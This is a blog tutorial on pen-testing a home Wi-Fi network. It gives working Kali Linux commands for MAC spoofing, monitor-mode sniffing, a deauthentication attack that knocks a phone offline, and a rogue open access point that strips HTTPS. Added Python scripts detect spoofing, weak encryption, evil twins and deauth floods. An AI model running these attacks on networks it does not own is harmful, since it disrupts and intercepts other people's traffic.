Hacking your Home: Pen-testing Your Local Network

Aliaksandra Havia
6 min read · Aug 11, 2018

Everyone knows how important security is. However, many of us assume that only big companies need to be concerned about security and that an attack could never happen to us. Unfortunately, that couldn’t be further from the truth. Security is just as important for home networks as it is for large companies. If you have internet at home, you have one or more wireless routers that may be exploited if they are not properly secured. That is why it is worth knowing how to perform pen-testing. A pen-test, or penetration test, is an attempt to evaluate the security of an IT infrastructure by safely trying to exploit its vulnerabilities. Let’s go over how we can use pen-testing to make our home network more secure.

Things you need to install to follow along:

VirtualBox, Kali Linux, USB Wireless (Wi-Fi) Adapter, Terminator Terminal

Sniffing Packets in Monitor Mode

A network is a number of devices connected together so that they can transfer data or share resources. All networks (Wi-Fi or wired) work on the same principle: one device acts as a server and holds the data that is shared with the connected devices. In most Wi-Fi networks the server is the router, and the shared resource is the Internet connection. Each network card has a physical address assigned by the card manufacturer, called a MAC address (Media Access Control). Devices use this address to identify each other and to deliver packets to the right place: each packet carries a source MAC and a destination MAC. You can change the MAC address value that is stored in memory (the permanent address burned into the card stays the same) using a program called macchanger. In my case the Wi-Fi card is wlan0.

root@kali:~# macchanger --random wlan0
Current MAC:   69:c7:df:5a:f5:78 (unknown)
Permanent MAC: 69:c7:df:5a:f5:78 (unknown)
New MAC:       aa:44:69:81:36:5a (unknown)
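The macchanger report above is worth reading from the other side of the fence as well. The first octet of a MAC address carries two flag bits: the U/L bit says whether the address was assigned locally (randomised or spoofed) rather than burned in by the vendor, and the I/G bit marks group (multicast) addresses. The following Python script is an added example, not code from the article or from macchanger; it parses the report shown above and decodes those bits, which is the same check a defender can run over DHCP leases or access-point association logs. The sample input is the article's own output, re-typed as a constant.

```python
import re

# Constructed sample input: the macchanger output from the article, re-typed here.
MACCHANGER_OUTPUT = """\
Current MAC:   69:c7:df:5a:f5:78 (unknown)
Permanent MAC: 69:c7:df:5a:f5:78 (unknown)
New MAC:       aa:44:69:81:36:5a (unknown)
"""

MAC_RE = re.compile(r"^[0-9A-Fa-f]{2}(?::[0-9A-Fa-f]{2}){5}$")
MACCHANGER_LINE_RE = re.compile(r"^(Current|Permanent|New) MAC:\s+(\S+)")


def describe_mac(mac):
    """Decode the two flag bits of the first octet and the vendor prefix (OUI).

    Bit 1 of the first octet is the U/L bit: 1 means the address was assigned
    locally (randomised or spoofed), 0 means it was assigned by the vendor.
    Bit 0 is the I/G bit: 1 marks a group (multicast) address, which should
    never be a station's own address.
    """
    if not MAC_RE.match(mac):
        raise ValueError(f"not a MAC address: {mac!r}")
    first_octet = int(mac[:2], 16)
    return {
        "oui": mac[:8].upper(),
        "locally_administered": bool(first_octet & 0x02),
        "multicast": bool(first_octet & 0x01),
    }


def parse_macchanger(output):
    """Pull the Current/Permanent/New addresses out of macchanger's report."""
    found = {}
    for line in output.splitlines():
        m = MACCHANGER_LINE_RE.match(line)
        if m:
            found[m.group(1).lower()] = m.group(2).lower()
    return found


def audit_macchanger(output):
    """Describe each reported address and say whether the card is now spoofing."""
    addrs = parse_macchanger(output)
    report = {name: describe_mac(mac) for name, mac in addrs.items()}
    report["spoofed"] = (
        "new" in addrs and "permanent" in addrs and addrs["new"] != addrs["permanent"]
    )
    return report


if __name__ == "__main__":
    for name, info in audit_macchanger(MACCHANGER_OUTPUT).items():
        print(name, info)
```

The randomised address macchanger picked (aa:44:69:...) has the U/L bit set, while the permanent address does not. On its own a locally administered address is not suspicious, since many phones present one to every network by default, but a station that cycles through several locally administered addresses while everything else about it stays the same is worth a second look.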

In the default mode of a wireless card, managed mode, the card only receives packets that are addressed to its own MAC address. There is, however, a mode that lets us capture all the packets within our Wi-Fi range, not only the ones sent to our device. To switch to monitor mode, run the following commands.

root@kali:~# iwconfig wlan0
wlan0     IEEE 802.11  ESSID:off/any
          Mode:Managed  Access Point: Not-Associated   Tx-Power=18 dBm
          Retry short limit:7   RTS thr:off   Fragment thr:off
          Encryption key:off
          Power Management:off
# the following commands will change the mode
root@kali:~# ifconfig wlan0 down
root@kali:~# iwconfig wlan0 mode monitor
root@kali:~# ifconfig wlan0 up

If you followed these steps, running iwconfig wlan0 again should show that the mode has changed to Monitor.

root@kali:~# iwconfig wlan0
wlan0     IEEE 802.11  Mode:Monitor  Frequency:2.412 GHz  Tx-Power=18 dBm
          Retry short limit:7   RTS thr:off   Fragment thr:off
          Power Management:off

Now you are ready to sniff some packets. The most useful information you can gather with packet sniffing is the MAC addresses of the surrounding networks and the encryption details used by each router. We are going to use airodump-ng, a packet sniffer that is part of the aircrack-ng package. It captures all the packets in range of your Wi-Fi card, and you can also use it to scan the Wi-Fi networks around you and gather information about them.

root@kali:~# airodump-ng wlan0

Airodump-ng can also be used for targeted packet sniffing by launching it against a specific target (its BSSID and channel). You can also write all the captured data to a file by adding --write filename after the channel, and then analyze the capture with Wireshark. Bear in mind that if the target network uses encryption, the captured data will not be readable.

root@kali:~# airodump-ng --bssid 84:1B:5E:CF:B6:D2 --channel 11 wlan0
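When airodump-ng is started with --write, it also produces a CSV summary of every access point it saw, including the Privacy and Cipher columns the text refers to. The following Python script is an added example, not code from the article or from the aircrack-ng project; it parses that CSV layout and audits your own scan the way a defender would: it flags open and WEP networks, WPA-only and TKIP configurations, and goes one step beyond the article by flagging any unknown BSSID that advertises your SSID. The sample CSV is constructed here (it mixes the two BSSIDs from the article with an invented third one), and the KNOWN_NETWORKS table standing in for your own router is an assumption you would fill in yourself.

```python
# Constructed sample in the layout airodump-ng writes to <prefix>-01.csv: the access-point
# section, a blank line, then the station section. The first two BSSIDs come from the
# article; AA:BB:CC:DD:EE:FF is invented to exercise the evil-twin check.
AIRODUMP_CSV = """\
BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
84:1B:5E:CF:B6:D2, 2018-08-11 14:00:01, 2018-08-11 14:05:10, 11, 54, WPA2, CCMP, PSK, -45, 120, 0, 0. 0. 0. 0, 8, HomeNet1,
00:11:22:33:44:00, 2018-08-11 14:02:30, 2018-08-11 14:05:10, 6, 54, OPN, , , -60, 40, 0, 0. 0. 0. 0, 8, Internet,
AA:BB:CC:DD:EE:FF, 2018-08-11 14:03:00, 2018-08-11 14:05:10, 1, 54, WEP, WEP, , -70, 30, 0, 0. 0. 0. 0, 8, HomeNet1,

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
56:F9:46:00:32:99, 2018-08-11 14:00:05, 2018-08-11 14:05:10, -50, 200, 84:1B:5E:CF:B6:D2,
"""

# Assumption: the SSID you own and the BSSID(s) of the router(s) that may legitimately serve it.
KNOWN_NETWORKS = {"HomeNet1": {"84:1B:5E:CF:B6:D2"}}


def parse_airodump_aps(text):
    """Return the access-point rows (the first CSV section) as dicts keyed by column name."""
    header, rows = None, []
    for line in text.splitlines():
        if not line.strip():
            if header is not None:
                break  # the blank line separates the AP section from the station section
            continue
        fields = [f.strip() for f in line.split(",")]
        if header is None:
            header = fields
        else:
            # Limitation: an ESSID that itself contains a comma would be cut short here.
            rows.append(dict(zip(header, fields)))
    return rows


def audit_access_points(rows, known=KNOWN_NETWORKS):
    """Map each BSSID with a weakness to the list of reasons it was flagged."""
    known_upper = {ssid: {b.upper() for b in bssids} for ssid, bssids in known.items()}
    findings = {}
    for ap in rows:
        bssid, essid = ap["BSSID"].upper(), ap["ESSID"]
        privacy, cipher = ap["Privacy"].upper(), ap["Cipher"].upper()
        issues = []
        if privacy == "OPN":
            issues.append("open network: client traffic is sent in the clear")
        elif "WEP" in privacy:
            issues.append("WEP: obsolete, recoverable encryption")
        elif "WPA2" not in privacy and "WPA3" not in privacy:
            issues.append("WPA (v1) only: upgrade to WPA2/WPA3")
        if "TKIP" in cipher:
            issues.append("TKIP cipher enabled: prefer CCMP/AES only")
        if essid in known_upper and bssid not in known_upper[essid]:
            issues.append("unknown BSSID advertising your SSID: possible evil twin")
        if issues:
            findings[bssid] = issues
    return findings


if __name__ == "__main__":
    for bssid, issues in audit_access_points(parse_airodump_aps(AIRODUMP_CSV)).items():
        print(bssid, "->", "; ".join(issues))
```

Run against the constructed scan, the WPA2/CCMP router passes, the open "Internet" network is flagged once, and the invented WEP access point is flagged twice: once for WEP and once for using the HomeNet1 SSID from an address that is not your router's.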

After examining the data for a particular network using its MAC address, you can use a de-authentication attack to disconnect any particular device from that network. In other words, this attack disconnects any device from any network within your range, even if the network is protected with a key. An attacker sends de-authentication packets to the router pretending to be the target machine (by spoofing its MAC address). At the same time, the attacker sends packets to the target machine (pretending to be the router) telling it that it needs to re-authenticate itself. I have used my network connection to successfully shut down the Wi-Fi connection on my iPhone for one thousand packets.

root@kali:~# aireplay-ng --deauth 1000 -a 00:05:F9:45:D9:75 -c 56:F9:46:00:32:99 wlan0
14:09:50  Waiting for beacon frame (BSSID: 00:05:F9:45:D9:75) on channel 36
14:09:58  Sending 64 directed DeAuth. STMAC: [56:F9:46:00:32:99] [ 2|24 ACKs]
14:09:58  Sending 64 directed DeAuth. STMAC: [56:F9:46:00:32:99] [ 2|26 ACKs]
14:09:59  Sending 64 directed DeAuth. STMAC: [56:F9:46:00:32:99] [ 1|16 ACKs]
14:10:17  Sending 64 directed DeAuth. STMAC: [56:F9:46:00:32:99] [ 0|64 ACKs]
14:10:18  Sending 64 directed DeAuth. STMAC: [56:F9:46:00:32:99] [ 0|64 ACKs]
14:10:18  Sending 64 directed DeAuth. STMAC: [56:F9:46:00:32:99] [ 0|64 ACKs]
14:10:19  Sending 64 directed DeAuth. STMAC: [56:F9:46:00:32:99] [ 0|63 ACKs]
14:10:20  Sending 64 directed DeAuth. STMAC: [56:F9:46:00:32:99] [ 0|64 ACKs]
14:10:20  Sending 64 directed DeAuth. STMAC: [56:F9:46:00:32:99] [ 0|64 ACKs]
14:14:09  Sending 64 directed write failed: Network is down
9:99] [ 0|38 ACKs]
wi_write(): Network is down
root@kali:~# ding 64 directed DeAuth. STMAC: [56:F9:46:00:32:99] [ 0|50 ACKs]
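The log above is what the attack looks like from the sending side; from the defender's side it is a burst of dozens of deauthentication frames per second aimed at one station, which is easy to tell apart from the handful of deauths a client produces when it roams or sleeps. The following Python script is an added example, not code from the article or from the aircrack-ng project. It decodes the fixed header of 802.11 deauthentication and disassociation frames from a capture and raises an alert when one (BSSID, target) pair exceeds a threshold inside a sliding time window. The capture it runs over is constructed in the script itself (64 frames at the article's AP/client pair plus some background events); the frame-building helper exists only to produce that test input. The real fix for this class of attack is Protected Management Frames (802.11w, mandatory with WPA3), which make forged deauths fail authentication so clients drop them.

```python
import struct
from collections import defaultdict, deque

FC_DEAUTH = 0xC0     # frame control byte 0: type 0 (management), subtype 12 (deauthentication)
FC_DISASSOC = 0xA0   # type 0, subtype 10 (disassociation)
MGMT_HEADER_LEN = 24  # frame control, duration, addr1-3, sequence control


def _mac_str(raw):
    return ":".join(f"{b:02X}" for b in raw)


def parse_disconnect_frame(frame):
    """Decode a deauthentication or disassociation frame; return None for anything else.

    Layout (no FCS): FC(2) Duration(2) Addr1=receiver(6) Addr2=transmitter(6)
    Addr3=BSSID(6) SeqCtl(2) ReasonCode(2).
    """
    if len(frame) < MGMT_HEADER_LEN + 2 or frame[0] not in (FC_DEAUTH, FC_DISASSOC):
        return None
    return {
        "kind": "deauth" if frame[0] == FC_DEAUTH else "disassoc",
        "dst": _mac_str(frame[4:10]),
        "src": _mac_str(frame[10:16]),
        "bssid": _mac_str(frame[16:22]),
        "reason": struct.unpack_from("<H", frame, MGMT_HEADER_LEN)[0],
    }


def detect_deauth_flood(capture, threshold=10, window=1.0):
    """Alert when one (bssid, target) pair sees `threshold` disconnect frames within `window` seconds.

    `capture` is an iterable of (timestamp_seconds, frame_bytes) in time order.
    """
    recent = defaultdict(deque)
    alerts = []
    for ts, frame in capture:
        info = parse_disconnect_frame(frame)
        if info is None:
            continue
        key = (info["bssid"], info["dst"])
        q = recent[key]
        q.append(ts)
        while q and ts - q[0] > window:
            q.popleft()  # drop frames that fell out of the window
        if len(q) == threshold:  # fires once per crossing, not on every later frame
            alerts.append({"bssid": key[0], "target": key[1], "at": ts,
                           "reason": info["reason"], "count": len(q)})
    return alerts


def _frame(fc, dst, src, bssid, reason):
    """Build an in-memory management frame for the constructed sample capture below."""
    raw = lambda m: bytes.fromhex(m.replace(":", ""))
    return (struct.pack("<BBH", fc, 0, 0) + raw(dst) + raw(src) + raw(bssid)
            + struct.pack("<H", 0) + struct.pack("<H", reason))


def constructed_capture():
    """Constructed sample: a burst of 64 deauths at the article's AP/client pair, plus background noise."""
    ap, phone = "00:05:F9:45:D9:75", "56:F9:46:00:32:99"
    other_ap, laptop = "84:1B:5E:CF:B6:D2", "76:73:0A:6D:96:24"
    cap = [(0.0, bytes([0x08, 0x00]) + bytes(22))]  # a data frame header; ignored by the parser
    cap += [(100.0 + i * 0.01, _frame(FC_DEAUTH, phone, ap, ap, 7)) for i in range(64)]
    cap.append((500.0, _frame(FC_DISASSOC, laptop, other_ap, other_ap, 8)))  # a single ordinary event
    cap.append((900.0, _frame(FC_DEAUTH, laptop, other_ap, other_ap, 3)))
    return cap


if __name__ == "__main__":
    for alert in detect_deauth_flood(constructed_capture()):
        print(f"deauth flood against {alert['target']} on {alert['bssid']} at t={alert['at']:.2f}s")
```

Only the burst trips the detector; the two spaced-out frames aimed at the second station never accumulate inside the one-second window. Tune `threshold` and `window` to your own environment, and key on the BSSID rather than the transmitter address, since the transmitter is spoofed in exactly the case you are looking for.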

Creating a Honeypot

Lastly, let’s create a fake access point (honeypot). Fake access points can be handy in many scenarios; one example is creating an open access point, which will attract a lot of clients, many of which will connect to it automatically. You can then sniff all the traffic created by the clients that connect to it, and since the network is open, the traffic will not be encrypted. To do this you need two cards: one connected to the internet and a Wi-Fi card to broadcast the access point. Clients send their requests to the attacker’s Wi-Fi card. The attacker sets up the machine so that every request arriving on the Wi-Fi card is forwarded to the second card that is connected to the internet. The response comes back through the second card, passes through the attacker’s machine to the Wi-Fi card, which forwards it to the client that requested it.

For a simple way to create a fake access point, we can use Mana-Toolkit. It automatically creates a new access point, starts sslstrip/firelamp and even attempts to bypass HSTS, which is used by Gmail and Facebook. To create a fake access point, install mana-toolkit with the following command: apt-get install mana-toolkit. Next, open the files hostapd-mana.conf and start-nat-simple.sh in leafpad and make sure that the interface name matches yours; in my case it is wlan0. If it is different, change the interface line in hostapd-mana.conf to match your interface name.

root@kali:~# leafpad /etc/mana-toolkit/hostapd-mana.conf
#A full description of options is available in https://github.com/sensepost/hostapd-mana/blob/master/hostapd/hostapd.conf
interface=wlan0
bssid=00:11:22:33:44:00
driver=nl80211
ssid=Internet
channel=6
root@kali:~# leafpad /usr/share/mana-toolkit/run-mana/start-nat-simple.sh
root@kali:~# bash /usr/share/mana-toolkit/run-mana/start-nat-simple.sh
Configuration file: /etc/mana-toolkit/hostapd-mana.conf
Using interface wlan0 with hwaddr 00:11:22:33:44:00 and ssid "Internet"
wlan0: interface state UNINITIALIZED->ENABLED
wlan0: AP-ENABLED
Hit enter to kill me

You are ready to connect your device. Try connecting your cell phone to it and you should see similar information.

wlan0: STA 56:F9:46:00:32:99 IEEE 802.11: associated  // iPhone one
wlan0: AP-STA-CONNECTED 56:F9:46:00:32:99
wlan0: STA 76:73:0a:6d:96:24 IEEE 802.11: associated  // iPhone two
wlan0: AP-STA-CONNECTED 76:73:0a:6d:96:24
wlan0: STA 76:73:0a:6d:96:24 IEEE 802.11: disassociated
wlan0: AP-STA-DISCONNECTED 76:73:0a:6d:96:24
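If you run an access point like this as a honeypot for your own network, the AP-STA-CONNECTED and AP-STA-DISCONNECTED events are the record of who showed up. The following Python script is an added example, not code from the article, from hostapd or from Mana-Toolkit; it replays those event lines, keeps per-station state (currently associated or not, number of connections) and notes whether each client presented a locally administered address. Both addresses in the log above have that U/L bit set, which is what a phone using per-network MAC randomisation presents, so a honeypot log identifies a session, not a device. The sample log is the article's output re-typed as a constant, with the author's "// iPhone" annotations left out because they are not part of hostapd's output.

```python
import re

# Constructed sample: the hostapd-mana event lines from the article, without the
# author's "// iPhone one/two" notes, which are not part of hostapd's output.
HOSTAPD_EVENTS = """\
wlan0: STA 56:F9:46:00:32:99 IEEE 802.11: associated
wlan0: AP-STA-CONNECTED 56:F9:46:00:32:99
wlan0: STA 76:73:0a:6d:96:24 IEEE 802.11: associated
wlan0: AP-STA-CONNECTED 76:73:0a:6d:96:24
wlan0: STA 76:73:0a:6d:96:24 IEEE 802.11: disassociated
wlan0: AP-STA-DISCONNECTED 76:73:0a:6d:96:24
"""

STA_EVENT_RE = re.compile(
    r"^(?P<iface>\w+): AP-STA-(?P<event>CONNECTED|DISCONNECTED) "
    r"(?P<mac>(?:[0-9A-Fa-f]{2}:){5}[0-9A-Fa-f]{2})$"
)


def is_locally_administered(mac):
    """U/L bit (bit 1 of the first octet): set means the client chose its own address."""
    return bool(int(mac[:2], 16) & 0x02)


def replay_station_events(log_text):
    """Walk the event log in order and return per-station state keyed by upper-case MAC."""
    stations = {}
    for line in log_text.splitlines():
        m = STA_EVENT_RE.match(line)
        if not m:
            continue  # "IEEE 802.11: associated" precedes AP-STA-CONNECTED; only the latter is counted
        mac = m["mac"].upper()
        rec = stations.setdefault(mac, {
            "iface": m["iface"],
            "connections": 0,
            "online": False,
            "locally_administered": is_locally_administered(mac),
        })
        if m["event"] == "CONNECTED":
            rec["connections"] += 1
            rec["online"] = True
        else:
            rec["online"] = False
    return stations


def online_stations(stations):
    """MACs that have connected and not yet disconnected, in sorted order."""
    return sorted(mac for mac, rec in stations.items() if rec["online"])


if __name__ == "__main__":
    state = replay_station_events(HOSTAPD_EVENTS)
    for mac, rec in state.items():
        print(mac, rec)
    print("still associated:", online_stations(state))
```

Replaying the article's log leaves one station associated (the first iPhone) and records one completed session for the second. Feeding the same function the live hostapd output, instead of a constant, gives a running picture of the honeypot's clients.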

Congratulations, you have successfully created a fake access point with the name “Internet” and connected another device to it.

On the whole, it is useful to perform packet sniffing and to create honeypots even for your home network, because they can tell you whether your network is vulnerable. Packet sniffing reveals the encryption algorithms your network uses, while a honeypot can detect not only that an attack is taking place but also who is trying to get into your home network. Although honeypots attract attackers, which helps white hats detect attacks, black hats can use packet sniffing to spoof MAC addresses and gain access to many systems in range, even encrypted ones.

Aliaksandra Havia

Software Immersive Student at Fullstack Academy The Grace Hopper Program